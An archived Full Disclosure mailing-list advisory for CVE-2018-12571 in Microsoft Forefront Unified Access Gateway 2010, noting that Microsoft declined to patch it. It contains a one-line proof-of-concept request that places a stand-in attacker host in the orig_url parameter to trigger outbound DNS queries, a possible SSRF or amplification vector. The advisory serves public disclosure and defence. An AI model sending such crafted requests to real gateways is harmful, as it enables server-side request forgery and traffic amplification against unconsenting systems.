lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon, 25 Jun 2018 11:26:08 +0300
From: okan coskun <okancoskun2@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Microsoft Forefront Unified Access Gateway 2010 External
	DNS Interaction

# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# MSRC: Case 39000
# Proof of Concept #1

Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
trigger outbound DNS queries for arbitrary hosts via a comma-separated list
of URLs in the orig_url parameter, possibly causing a traffic amplification
and/or SSRF outcome.

/uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/Intern
alSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&
resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=
0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%
2D41ae%2D89f1%2D1eb6eff34091&orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM
<http://2fattacker.site.com/>%2Ftest

# Fixes

It will not be patched by Microsoft.

Reason:
We have completed our investigation and determined that the case doesn't
meet the bar for servicing in a security update

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists